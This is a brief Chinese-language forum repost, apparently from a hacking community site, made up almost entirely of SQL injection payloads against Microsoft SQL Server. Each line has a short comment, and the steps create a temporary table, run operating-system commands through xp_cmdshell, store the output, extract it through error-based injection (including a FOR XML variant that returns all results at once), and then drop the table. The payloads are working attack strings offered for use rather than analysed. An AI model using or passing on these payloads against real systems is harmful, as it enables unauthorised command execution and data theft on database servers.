转自:http://blog.csdn.net/niexinming/article/details/50205309
';create table temp(id int identity(1,1),a varchar(8000));-- 创建一个表
';insert into temp exec master.dbo.xp_cmdshell 'dir c:\'; -- 执行cmd指令并且插入到表中
' and (select top 1 a from temp where id>5)>0 -- 查询这个表里面的信息,得到cmd指令运行结果
' or (select count(*) from temp)>0 -- 25 得到这个表里面的数据行数
';drop table temp; -- 删除表
优雅的方式: ';create table temp(id int identity(1,1),a varchar(8000));-- 创建一个表
';insert into temp exec master.dbo.xp_cmdshell 'dir c:\'; -- 执行cmd指令并且插入到表中
' and (select substring((select a from temp for xml auto),1,4000 ) ) >0-- 可以一次得到所有的结果 ';drop table temp; -- 删除表
| 
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2017-7-3 00:57:08
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡